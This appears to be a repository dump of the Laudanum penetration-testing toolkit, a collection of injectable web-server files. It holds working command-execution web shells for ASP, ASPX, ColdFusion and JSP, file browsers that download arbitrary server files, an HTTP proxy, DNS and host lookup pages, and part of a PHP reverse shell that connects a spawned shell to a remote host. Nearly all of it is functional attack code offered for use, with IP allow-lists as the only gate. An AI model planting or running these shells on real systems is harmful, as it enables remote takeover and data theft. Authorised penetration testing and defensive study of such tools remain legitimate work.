ubound(allowedIPs) 67 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 68 | allowed = 1 69 | exit for 70 | end if 71 | next 72 | ' send a 404 if the IP Address is not allowed 73 | if allowed = 0 then 74 | Response.Status = "404 File Not Found" 75 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 76 | Response.End 77 | end if 78 | 79 | ' create file object for use everywhere 80 | set fso = CreateObject("Scripting.FileSystemObject") 81 | 82 | ' download a file if selected 83 | filepath = trim(Request.QueryString("file")) 84 | 'validate file 85 | if len(filepath) > 0 then 86 | if fso.FileExists(filepath) then 87 | 'valid file 88 | 89 | Set file = fso.GetFile(filepath) 90 | Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name 91 | 'Response.AddHeader "Content-Length", file.Size 92 | Response.ContentType = "application/octet-stream" 93 | set stream = Server.CreateObject("ADODB.Stream") 94 | stream.Open 95 | stream.Type = 1 96 | Response.Charset = "UTF-8" 97 | stream.LoadFromFile(file.Path) 98 | ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. 99 | Response.BinaryWrite(stream.Read) 100 | stream.Close 101 | set stream = Nothing 102 | set file = Nothing 103 | Response.End 104 | end if 105 | end if 106 | 107 | ' begin rendering the page 108 | %> 109 | 110 | 111 | Laudanum ASP File Browser 112 | 113 | 114 | 115 |

Laudanum File Browser 0.1

Listing of: <% 140 | list = split(folder.path, "\") 141 | temppath = "" 142 | for each i in list 143 | temppath = temppath & i & "\" 144 | %><%=i%>\ <% 145 | next 146 | %>

<% 147 | 148 | ' build table for listing 149 | %> 150 | <% 151 | ' Parent Path if it exists 152 | if not folder.IsRootFolder then 153 | %><% 154 | end if 155 | 156 | ' Get the folders 157 | set list = folder.SubFolders 158 | for each i in list 159 | %><% 160 | next 161 | 162 | ' Get the files 163 | set list = folder.Files 164 | for each i in list 165 | %><% 166 | next 167 | 168 | ' all done 169 | %> 170 |

Name	Size	Modified	Accessed	Created
..
<%=i.Name%>\
<%=i.Name%>	<%=FormatNumber(i.Size, 0)%>	<%=i.DateLastModified%>	<%=i.DateLastAccessed%>	<%=i.DateCreated%>

171 |

172 |

173 | Copyright © 2014, Kevin Johnson and the Laudanum team.
174 | Written by Tim Medin.
175 | Get the latest version at laudanum.secureideas.net. 176 |

177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /laudanum/asp/proxy.asp: -------------------------------------------------------------------------------- 1 | <%@Language="VBScript"%> 2 | <%Option Explicit%> 3 | <%Response.Buffer = True%> 4 | <% 5 | ' ******************************************************************************* 6 | ' *** 7 | ' *** Laudanum Project 8 | ' *** A Collection of Injectable Files used during a Penetration Test 9 | ' *** 10 | ' *** More information is available at: 11 | ' *** http://laudanum.secureideas.net 12 | ' *** laudanum@secureideas.net 13 | ' *** 14 | ' *** Project Leads: 15 | ' *** Kevin Johnson 17 | ' *** 18 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 19 | ' *** 20 | ' ******************************************************************************** 21 | ' *** 22 | ' *** This file provides access as a proxy. 23 | ' *** Written by Tim Medin 24 | ' *** 25 | ' ******************************************************************************** 26 | ' *** This program is free software; you can redistribute it and/or 27 | ' *** modify it under the terms of the GNU General Public License 28 | ' *** as published by the Free Software Foundation; either version 2 29 | ' *** of the License, or (at your option) any later version. 30 | ' *** 31 | ' *** This program is distributed in the hope that it will be useful, 32 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | ' *** GNU General Public License for more details. 35 | ' *** 36 | ' *** You can get a copy of the GNU General Public License from this 37 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | ' *** You can also write to the Free Software Foundation, Inc., Temple 39 | ' *** Place - Suite Boston, MA USA. 40 | ' *** 41 | ' ***************************************************************************** */ 42 | 43 | ' ***************** Config entries below *********************** 44 | 45 | ' Define variables 46 | Dim allowedIPs 47 | Dim allowed 48 | Dim i 49 | Dim s 'generic string, yeah, I know bad, but at this point I just want it to work 50 | Dim urltemp 51 | Dim urlscheme 52 | Dim urlhost 53 | Dim urlport 54 | Dim urlpath 55 | Dim urlfile 56 | Dim urlquery 57 | Dim http 58 | Dim method 59 | Dim contenttype 60 | Dim stream 61 | Dim regex 62 | Dim body 63 | Dim params 64 | 65 | function err_handler() 66 | %> 67 | 68 | 69 | Laudanum ASP Proxy 70 | 71 | 72 |

Fatal Error!

73 | <%=Err.Number%>
74 | <%=Err.Message%>
75 |

76 |

77 | Copyright © 2014, Kevin Johnson and the Laudanum team.
78 | Written by Tim Medin.
79 | Get the latest version at laudanum.secureideas.net. 80 |

Laudanum ASP Proxy

337 | 338 | 342 |

343 |

344 | Copyright © 2014, Kevin Johnson and the Laudanum team.
345 | Written by Tim Medin.
346 | Get the latest version at laudanum.secureideas.net. 347 |

348 | 349 | <% 350 | 351 | Response.End() 352 | end if 353 | 354 | ' Let's get our Proxy on!!! 355 | ' define the request type 356 | if useMSXML2 = 1 then 357 | Set http = Server.CreateObject("MSXML2.XMLHTTP") 358 | else 359 | Set http = Server.CreateObject("Microsoft.XMLHTTP") 360 | end if 361 | 362 | ' get the request type 363 | method = Request.ServerVariables("REQUEST_METHOD") 364 | 365 | ' setup the request, false means don't send it yet 366 | http.Open method, FullUrl, False 367 | 368 | ' send the request 369 | if method = "POST" then 370 | params = CleanFormValues 371 | http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" 372 | http.setRequestHeader "Content-length", len(params) 373 | http.setRequestHeader "Connection", "close" 374 | http.Send(params) 375 | else 376 | http.Send 377 | end if 378 | 379 | ' Replace the normal headers with the ones from the response 380 | Response.Clear 381 | contenttype = http.getResponseHeader("Content-Type") 382 | Response.ContentType = contenttype 383 | 384 | ' rewrite the headers. Takes headers and passes them to new request 385 | RewriteHeaders() 386 | 387 | ' how to respond? is it text or is it something else? 388 | if lcase(left(contenttype, 4)) = "text" then 389 | ' response is text, so we need to rewrite it, but that's later 390 | 391 | 392 | ' do the rewriting 393 | body = http.responseText 394 | 395 | Set regex = New RegExp 396 | regex.IgnoreCase = true 397 | regex.Global = true 398 | 399 | ' rewrite images and links - absolute reference 400 | s = urlscheme & urlhost & urlport 401 | regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" 402 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 403 | 404 | ' rewrite images and links - full reference 405 | regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" 406 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") 407 | 408 | ' rewrite images and links - absolute reference 409 | s = urlscheme & urlhost & urlport & urlpath 410 | regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" 411 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 412 | 413 | 414 | ' rewrite forms - absolute reference 415 | s = urlscheme & urlhost & urlport 416 | regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])" 417 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 418 | 419 | ' rewrite forms - full reference 420 | regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])" 421 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 422 | 423 | ' rewrite forms - absolute reference 424 | s = urlscheme & urlhost & urlport & urlpath 425 | regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])" 426 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 427 | 428 | Response.Write(body) 429 | 430 | Set regex = nothing 431 | else 432 | ' some sort of binary response, so stream it 433 | Set stream = nothing 434 | Set stream = Server.CreateObject("ADODB.Stream") 435 | stream.Type = 1 'Binary 436 | stream.Open 437 | stream.Write http.responseBody 438 | stream.Position = 0 439 | 440 | For i = 0 to stream.Size \ chunkSize 441 | Response.BinaryWrite(stream.Read(chunkSize)) 442 | next 443 | Set stream = nothing 444 | end if 445 | 446 | Set http = nothing 447 | 448 | Response.End 449 | 450 | :HandleError 451 | err_handler 452 | 453 | %> 454 | 455 | -------------------------------------------------------------------------------- /laudanum/asp/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood 20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "
") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "

" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "

" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | 67 | Laundanum ASP Shell 68 | 69 | 76 |

77 |

78 | Copyright © 2014, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net. 81 |

82 | 83 | 84 | -------------------------------------------------------------------------------- /laudanum/aspx/shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#"%> 2 | <%@ Import Namespace="System" %> 3 | 4 | 103 | 104 | Laundanum ASPX Shell 105 | 106 | 107 |

108 | cmd /c 109 |
110 | STDOUT:
111 |

<% = stdout.Replace("<", "<") %>

112 |
113 |
114 |
115 | STDERR:
116 |

<% = stderr.Replace("<", "<") %>

117 | 118 | 119 |

120 | 121 |

122 |

123 | Copyright © 2014, Kevin Johnson and the Laudanum team.
124 | Written by Tim Medin.
125 | Get the latest version at laudanum.secureideas.net. 126 |

127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /laudanum/cfm/shell.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | Laudanum Coldfusion Shell 65 | 66 | 78 | 79 | 80 | 81 | 82 | 83 |

 84 |     
 85 |     #Replace(foo, "<", "<", "All")#
 86 |

87 | 88 | 89 | Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. 90 | 91 |

92 |

98 | 99 | 100 | -------------------------------------------------------------------------------- /laudanum/jsp/cmd.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jbarcia/Web-Shells/599cae3d6c134e98d7f7384ba3e88a5114cf4c88/laudanum/jsp/cmd.war -------------------------------------------------------------------------------- /laudanum/jsp/makewar.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | jar -cvf cmd.war warfiles/* 4 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.6.0_10 (Sun Microsystems Inc.) 3 | 4 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | Command 9 | /cmd.jsp 10 | 11 | 12 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | 4 | if (request.getRemoteAddr() != "4.4.4.4") { 5 | response.sendError(HttpServletResponse.SC_NOT_FOUND) 6 | return; 7 | } 8 | 9 | %> 10 | 11 | Laudanum JSP Shell 12 | 13 | Commands with JSP 14 | 19 |

20 | <%
21 | if (request.getParameter("cmd") != null) {
22 | out.println("Command: " + request.getParameter("cmd") + "
");
23 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
24 | OutputStream os = p.getOutputStream();
25 | InputStream in = p.getInputStream();
26 | DataInputStream dis = new DataInputStream(in);
27 | String disr = dis.readLine();
28 | while ( disr != null ) {
29 | out.println(disr);
30 | disr = dis.readLine();
31 | }
32 | }
33 | %>
34 |

35 |

36 |

37 | Copyright © 2014, Kevin Johnson and the Laudanum team.
38 | Written by Tim Medin.
39 | Get the latest version at laudanum.secureideas.net. 40 |

41 | 42 | -------------------------------------------------------------------------------- /laudanum/php/dns.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides access to DNS on the system. 20 | *** Written by Tim Medin 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | // ***************** Config entries below *********************** 41 | 42 | // IPs are enterable as individual addresses TODO: add CIDR support 43 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 44 | 45 | # *********** No editable content below this line ************** 46 | 47 | $allowed = 0; 48 | foreach ($allowedIPs as $IP) { 49 | if ($_SERVER["REMOTE_ADDR"] == $IP) 50 | $allowed = 1; 51 | } 52 | 53 | if ($allowed == 0) { 54 | header("HTTP/1.0 404 Not Found"); 55 | die(); 56 | } 57 | 58 | 59 | 60 | /* This error handler will turn all notices, warnings, and errors into fatal 61 | * errors, unless they have been suppressed with the @-operator. */ 62 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 63 | /* The @-opertor (used with chdir() below) temporarely makes 64 | * error_reporting() return zero, and we don't want to die in that case. 65 | * We do note the error in the output, though. */ 66 | if (error_reporting() == 0) { 67 | $_SESSION['output'] .= $errstr . "\n"; 68 | } else { 69 | die(' 71 | 72 | 73 | Laudanum PHP DNS Access 74 | 75 | 76 |

Fatal Error!

77 |

' . $errstr . '

78 |

in ' . $errfile . ', line ' . $errline . '.

79 | 80 |

81 |

82 | Copyright © 2014, Kevin Johnson and the Laudanum team.
83 | Written by Tim Medin.
84 | Get the latest version at laudanum.secureideas.net. 85 |

86 | 87 | 88 | '); 89 | } 90 | } 91 | 92 | set_error_handler('error_handler'); 93 | 94 | 95 | /* Initialize some variables we need again and again. */ 96 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 97 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 98 | ?> 99 | 101 | 102 | 103 | Laudanum PHP DNS Access 104 | 105 | 106 | 111 | 112 | 113 | 114 |

DNS Query 0.1

115 | 137 | 138 | 139 | "; 144 | echo "Result = "; 145 | print_r($result); 146 | echo "Auth NS = "; 147 | print_r($authns); 148 | echo "Additional = "; 149 | print_r($addtl); 150 | echo ""; 151 | } 152 | ?> 153 |

154 |

155 | Copyright © 2014, Kevin Johnson and the Laudanum team.
156 | Written by Tim Medin.
157 | Get the latest version at laudanum.secureideas.net. 158 |

159 | 160 | 161 | 162 | -------------------------------------------------------------------------------- /laudanum/php/file.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file allows browsing of the file system. 20 | *** Written by Tim Medin 21 | *** 2013-12-28 Updated by Jason Gillam - fixed parent folder 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // ***************** Config entries below *********************** 42 | 43 | // IPs are enterable as individual addresses TODO: add CIDR support 44 | $allowedIPs = array("192.168.1.1","127.0.0.1"); 45 | 46 | # *********** No editable content below this line ************** 47 | 48 | $allowed = 0; 49 | foreach ($allowedIPs as $IP) { 50 | if ($_SERVER["REMOTE_ADDR"] == $IP) 51 | $allowed = 1; 52 | } 53 | 54 | if ($allowed == 0) { 55 | header("HTTP/1.0 404 Not Found"); 56 | die(); 57 | } 58 | 59 | 60 | 61 | /* This error handler will turn all notices, warnings, and errors into fatal 62 | * errors, unless they have been suppressed with the @-operator. */ 63 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 64 | /* The @-opertor (used with chdir() below) temporarely makes 65 | * error_reporting() return zero, and we don't want to die in that case. 66 | * We do note the error in the output, though. */ 67 | if (error_reporting() == 0) { 68 | $_SESSION['output'] .= $errstr . "\n"; 69 | } else { 70 | die(' 72 | 73 | 74 | Laudanum PHP File Browser 75 | 76 | 77 |

Fatal Error!

78 |

' . $errstr . '

79 |

in ' . $errfile . ', line ' . $errline . '.

80 | 81 |

82 |

83 | Copyright © 2014, Kevin Johnson and the Laudanum team.
84 | Written by Tim Medin.
85 | Get the latest version at laudanum.secureideas.net. 86 |

87 | 88 | 89 | '); 90 | } 91 | } 92 | 93 | set_error_handler('error_handler'); 94 | 95 | 96 | /* Initialize some variables we need again and again. */ 97 | $dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; 98 | $file = isset($_GET["file"]) ? $_GET["file"] : ""; 99 | 100 | if ($file != "") { 101 | if(file_exists($file)) { 102 | 103 | $s = split("/", $file); 104 | $filename = $s[count($s) - 1]; 105 | header("Content-type: application/x-download"); 106 | header("Content-Length: ".filesize($file)); 107 | header("Content-Disposition: attachment; filename=\"".$filename."\""); 108 | readfile($file); 109 | die(); 110 | } 111 | } 112 | ?> 113 | 115 | 116 | 117 | Laudanum File Browser 118 | 119 | 120 | 122 | 123 | 124 | 125 |

Laudanum File Browser 0.1

126 | Home
127 | 128 | Directory listing of / "; 137 | $breadcrumb = '/'; 138 | foreach ($dirs as $d) { 139 | if ($d != '') { 140 | $breadcrumb .= $d . "/"; 141 | echo "$d/ "; 142 | } 143 | } 144 | echo ""; 145 | 146 | // translate .. to a real dir 147 | $parentdir = ""; 148 | for ($i = 0; $i < count($dirs) - 2; $i++) { 149 | $parentdir .= $dirs[$i] . "/"; 150 | } 151 | 152 | echo ""; 153 | echo ""; 154 | echo ""; 155 | 156 | //get listing, separate into directories and files 157 | $listingfiles = array(); 158 | $listingdirs = array(); 159 | 160 | if ($handle = @opendir($curdir)) { 161 | while ($o = readdir($handle)) { 162 | if ($o == "." || $o == "..") continue; 163 | if (@filetype($curdir . $o) == "dir") { 164 | $listingdirs[] = $o . "/"; 165 | } 166 | else { 167 | $listingfiles[] = $o; 168 | } 169 | } 170 | 171 | @natcasesort($listingdirs); 172 | @natcasesort($listingfiles); 173 | 174 | //display directories 175 | foreach ($listingdirs as $f) { 176 | echo ""; 177 | } 178 | 179 | //display files 180 | foreach ($listingfiles as $f) { 181 | echo ""; 182 | } 183 | } 184 | else { 185 | echo ""; 186 | } 187 | ?> 188 |

Name	Date	Size
../
" . $f . "	" . "
" . $f . "	" . "	" . number_format(@filesize($curdir . $f)) . "
Can't open directory

112 | Home
113 | 114 | Directory listing of / "; 123 | $breadcrumb = '/'; 124 | foreach ($dirs as $d) { 125 | if ($d != '') { 126 | $breadcrumb .= $d . "/"; 127 | echo "$d/ "; 128 | } 129 | } 130 | echo ""; 131 | 132 | // translate .. to a real dir 133 | $parentdir = ""; 134 | for ($i = 0; $i < count($dirs) - 2; $i++) { 135 | $parentdir .= $dirs[$i] . "/"; 136 | } 137 | 138 | echo ""; 139 | echo ""; 140 | echo ""; 141 | 142 | //get listing, separate into directories and files 143 | $listingfiles = array(); 144 | $listingdirs = array(); 145 | 146 | if ($handle = @opendir($curdir)) { 147 | while ($o = readdir($handle)) { 148 | if ($o == "." || $o == "..") continue; 149 | if (@filetype($curdir . $o) == "dir") { 150 | $listingdirs[] = $o . "/"; 151 | } 152 | else { 153 | $listingfiles[] = $o; 154 | } 155 | } 156 | 157 | @natcasesort($listingdirs); 158 | @natcasesort($listingfiles); 159 | 160 | //display directories 161 | foreach ($listingdirs as $f) { 162 | echo ""; 163 | } 164 | 165 | //display files 166 | foreach ($listingfiles as $f) { 167 | echo ""; 168 | } 169 | } 170 | else { 171 | echo ""; 172 | } 173 | ?> 174 |

Name	Date	Size
../
" . $f . "	" . "
" . $f . "	" . "	" . number_format(@filesize($curdir . $f)) . "
Can't open directory

175 |

176 |

181 | 182 | 183 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/host.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a host lookup by ip address. 20 | *** Written by Jason Gillam 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | include 'ipcheck.php'; 41 | 42 | 43 | /* This error handler will turn all notices, warnings, and errors into fatal 44 | * errors, unless they have been suppressed with the @-operator. */ 45 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 46 | /* The @-opertor (used with chdir() below) temporarely makes 47 | * error_reporting() return zero, and we don't want to die in that case. 48 | * We do note the error in the output, though. */ 49 | if (error_reporting() == 0) { 50 | $_SESSION['output'] .= $errstr . "\n"; 51 | } else { 52 | die(' 54 | 55 | 56 | Laudanum PHP Hostname by IP Lookup 57 | 58 | 59 |

Fatal Error!

60 |

' . $errstr . '

61 |

in ' . $errfile . ', line ' . $errline . '.

62 | 63 |

64 |

Host Lookup 0.1

98 | 106 | 107 | 108 | "; 113 | echo "Result = "; 114 | print_r($result); 115 | echo ""; 116 | } 117 | ?> 118 |

119 |

124 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/ipcheck.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools 20 | *** by someone other than the person who uploaded Laudanum. This file should be included 21 | *** in other Laudanum tools and not called directly. 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | // ***************** Config entries below *********************** 44 | // IPs are enterable as individual addresses TODO: add CIDR support 45 | $wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1"); 46 | 47 | 48 | # *********** No editable content below this line ************** 49 | 50 | $wpl_allowed = 0; 51 | foreach ($wpl_allowedIPs as $IP) { 52 | if ($_SERVER["REMOTE_ADDR"] == $IP) 53 | $wpl_allowed = 1; 54 | } 55 | 56 | if ($wpl_allowed == 0) { 57 | header("HTTP/1.0 404 Not Found"); 58 | die(); 59 | } 60 | 61 | ?> -------------------------------------------------------------------------------- /laudanum/wordpress/templates/killnc.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file attempts to kill all netcat processes spawned by the current user. 20 | *** This may be useful in cases where a reverse shell attempt has gone wrong. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | include 'ipcheck.php'; 44 | 45 | 46 | /* This error handler will turn all notices, warnings, and errors into fatal 47 | * errors, unless they have been suppressed with the @-operator. */ 48 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 49 | /* The @-opertor (used with chdir() below) temporarely makes 50 | * error_reporting() return zero, and we don't want to die in that case. 51 | * We do note the error in the output, though. */ 52 | if (error_reporting() == 0) { 53 | $_SESSION['output'] .= $errstr . "\n"; 54 | } else { 55 | die(' 57 | 58 | 59 | Laudanum PHP Hostname by IP Lookup 60 | 61 | 62 |

Fatal Error!

63 |

' . $errstr . '

64 |

in ' . $errfile . ', line ' . $errline . '.

65 | 66 |

67 |

72 | 73 | 74 | '); 75 | } 76 | } 77 | 78 | set_error_handler('error_handler'); 79 | 80 | 81 | 82 | ?> 83 | 85 | 86 | 87 | Laudanum Kill nc 88 | 89 | 90 | 91 | 92 |

Kill nc 0.1

93 | 94 | 95 |

96 |

101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 111 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 112 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 113 | ); 114 | 115 | $process = proc_open($shell, $descriptorspec, $pipes); 116 | 117 | if (!is_resource($process)) { 118 | printit("ERROR: Can't spawn shell"); 119 | exit(1); 120 | } 121 | 122 | // Set everything to non-blocking 123 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 124 | stream_set_blocking($pipes[0], 0); 125 | stream_set_blocking($pipes[1], 0); 126 | stream_set_blocking($pipes[2], 0); 127 | stream_set_blocking($sock, 0); 128 | 129 | printit("Successfully opened reverse shell to $ip:$port"); 130 | 131 | while (1) { 132 | // Check for end of TCP connection 133 | if (feof($sock)) { 134 | printit("ERROR: Shell connection terminated"); 135 | break; 136 | } 137 | 138 | // Check for end of STDOUT 139 | if (feof($pipes[1])) { 140 | printit("ERROR: Shell process terminated"); 141 | break; 142 | } 143 | 144 | // Wait until a command is end down $sock, or some 145 | // command output is available on STDOUT or STDERR 146 | $read_a = array($sock, $pipes[1], $pipes[2]); 147 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 148 | 149 | // If we can read from the TCP socket, send 150 | // data to process's STDIN 151 | if (in_array($sock, $read_a)) { 152 | if ($debug) printit("SOCK READ"); 153 | $input = fread($sock, $chunk_size); 154 | if ($debug) printit("SOCK: $input"); 155 | fwrite($pipes[0], $input); 156 | } 157 | 158 | // If we can read from the process's STDOUT 159 | // send data down tcp connection 160 | if (in_array($pipes[1], $read_a)) { 161 | if ($debug) printit("STDOUT READ"); 162 | $input = fread($pipes[1], $chunk_size); 163 | if ($debug) printit("STDOUT: $input"); 164 | fwrite($sock, $input); 165 | } 166 | 167 | // If we can read from the process's STDERR 168 | // send data down tcp connection 169 | if (in_array($pipes[2], $read_a)) { 170 | if ($debug) printit("STDERR READ"); 171 | $input = fread($pipes[2], $chunk_size); 172 | if ($debug) printit("STDERR: $input"); 173 | fwrite($sock, $input); 174 | } 175 | } 176 